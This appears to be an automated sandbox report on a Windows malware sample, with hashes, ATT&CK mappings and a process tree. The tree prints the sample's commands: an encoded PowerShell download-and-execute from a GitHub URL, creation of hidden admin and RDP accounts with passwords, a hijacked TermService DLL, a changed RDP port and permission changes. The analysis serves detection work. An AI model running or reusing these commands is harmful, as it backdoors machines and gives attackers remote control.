2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c

Analysis

max time kernel
4s
max time network
122s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
04-01-2024 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4069c013a2ec0c082f78a73719dcabb7.exe
Size

5.9MB
MD5

4069c013a2ec0c082f78a73719dcabb7
SHA1

14d643ed38a6c64c299bc24379b5b66ac958aff6
SHA256

2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c
SHA512

5a5bdfa931a1f9a2b8855e6331669404f332f504f15a5eae7fb6e51f7ac99bbb83f5c986931fadb00c761e81617a47707cff811eb6e2ebf55369cec8f6002f05
SSDEEP

49152:pFWJLirb/TkvO90dL3BmAFd4A64nsfJ5mb5KN0ZKrVbLMe8paAzK1X4FXtPqnJ0x:pF8mmMmAQQQQQQQQQQQQQ

Score

10^/10

discovery exploit

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
1624	icacls.exe
2016	icacls.exe
308	takeown.exe
2224	icacls.exe
1968	icacls.exe
1984	icacls.exe
2012	icacls.exe
2088	icacls.exe

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	Process
308	takeown.exe
1624	icacls.exe
2016	icacls.exe
2224	icacls.exe
1968	icacls.exe
1984	icacls.exe
2012	icacls.exe
2088	icacls.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
240	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2988	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7.exe

description	pid	Process
Token: SeDebugPrivilege	3032	4069c013a2ec0c082f78a73719dcabb7.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

4069c013a2ec0c082f78a73719dcabb7.exe

description	pid	Process	procid_target
PID 3032 wrote to memory of 2788	3032	4069c013a2ec0c082f78a73719dcabb7.exe	30
PID 3032 wrote to memory of 2788	3032	4069c013a2ec0c082f78a73719dcabb7.exe	30
PID 3032 wrote to memory of 2788	3032	4069c013a2ec0c082f78a73719dcabb7.exe	30

C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7.exe
"C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  PID:2788
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-hog7bsq.cmdline"
    3⤵
    PID:2972
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES23B7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC23B6.tmp"
      4⤵
      PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    PID:1672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    PID:2940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    PID:2600
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2796
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    PID:636
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:2056
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2988
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2284
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1624
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2016
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2224
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1968
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1984
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2012
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2088
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:308
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
1⤵
PID:2004

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" SFVRQGEO$ /ADD
1⤵
PID:808
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" SFVRQGEO$ /ADD
  2⤵
  PID:912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 8uaadX6O
1⤵
PID:1956

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
1⤵
- Detects videocard installed
PID:240

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
1⤵
PID:2720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2156

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1896

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1636

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2612

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2132

C:\Windows\system32\net.exe
net.exe user wgautilacc 8uaadX6O
1⤵
PID:1860

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 8uaadX6O
1⤵
PID:2136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:1988

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:1928

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:576

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" SFVRQGEO$ /ADD
1⤵
PID:2332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1808

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:1108

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
PID:772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 8uaadX6O /add
1⤵
PID:1668

C:\Windows\system32\net.exe
net.exe user wgautilacc 8uaadX6O /add
1⤵
PID:1540

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 8uaadX6O /add
1⤵
PID:2428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
1⤵
PID:2448

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
1⤵
PID:2440

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
PID:448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
1⤵
PID:1936

C:\Windows\system32\net.exe
net start TermService
1⤵
PID:1584

C:\Windows\system32\cmd.exe
cmd /c net start TermService
1⤵
PID:2528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
1⤵
PID:1592

C:\Windows\system32\net.exe
net start rdpdr
1⤵
PID:1644

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
1⤵
PID:1472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1672-76-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/1672-74-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/1672-81-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/1672-75-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/1672-80-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/1672-78-0x0000000002904000-0x0000000002907000-memory.dmp

Filesize
12KB

Download
memory/1672-77-0x0000000002900000-0x0000000002980000-memory.dmp

Filesize
512KB

Download
memory/2156-106-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2156-107-0x0000000001270000-0x00000000012F0000-memory.dmp

Filesize
512KB

Download
memory/2156-110-0x0000000001270000-0x00000000012F0000-memory.dmp

Filesize
512KB

Download
memory/2156-111-0x0000000001270000-0x00000000012F0000-memory.dmp

Filesize
512KB

Download
memory/2156-109-0x0000000001270000-0x00000000012F0000-memory.dmp

Filesize
512KB

Download
memory/2156-108-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2156-113-0x0000000001270000-0x00000000012F0000-memory.dmp

Filesize
512KB

Download
memory/2156-112-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2600-47-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2600-54-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2600-49-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2600-48-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2600-50-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2600-51-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2600-52-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2600-53-0x0000000002B10000-0x0000000002B90000-memory.dmp

Filesize
512KB

Download
memory/2788-17-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2788-12-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2788-14-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2788-40-0x0000000002B50000-0x0000000002B82000-memory.dmp

Filesize
200KB

Download
memory/2788-79-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2788-21-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-22-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-38-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-34-0x0000000002970000-0x0000000002978000-memory.dmp

Filesize
32KB

Download
memory/2788-15-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-84-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-86-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-13-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2788-83-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-39-0x0000000002B50000-0x0000000002B82000-memory.dmp

Filesize
200KB

Download
memory/2788-85-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2788-87-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2940-63-0x0000000002DC0000-0x0000000002E40000-memory.dmp

Filesize
512KB

Download
memory/2940-62-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2940-64-0x0000000002DC4000-0x0000000002DC7000-memory.dmp

Filesize
12KB

Download
memory/2940-66-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2940-68-0x000007FEED340000-0x000007FEEDCDD000-memory.dmp

Filesize
9.6MB

Download
memory/2940-65-0x0000000002DCC000-0x0000000002E33000-memory.dmp

Filesize
412KB

Download
memory/2972-25-0x00000000021F0000-0x0000000002270000-memory.dmp

Filesize
512KB

Download
memory/3032-0-0x00000000417B0000-0x0000000041BD6000-memory.dmp

Filesize
4.1MB

Download
memory/3032-46-0x000007FEF5130000-0x000007FEF5B1C000-memory.dmp

Filesize
9.9MB

Download
memory/3032-61-0x0000000041310000-0x0000000041390000-memory.dmp

Filesize
512KB

Download
memory/3032-60-0x0000000041310000-0x0000000041390000-memory.dmp

Filesize
512KB

Download
memory/3032-67-0x0000000041310000-0x0000000041390000-memory.dmp

Filesize
512KB

Download
memory/3032-5-0x0000000041310000-0x0000000041390000-memory.dmp

Filesize
512KB

Download
memory/3032-2-0x0000000041310000-0x0000000041390000-memory.dmp

Filesize
512KB

Download
memory/3032-3-0x0000000041310000-0x0000000041390000-memory.dmp

Filesize
512KB

Download
memory/3032-4-0x0000000041310000-0x0000000041390000-memory.dmp

Filesize
512KB

Download
memory/3032-1-0x000007FEF5130000-0x000007FEF5B1C000-memory.dmp

Filesize
9.9MB

Download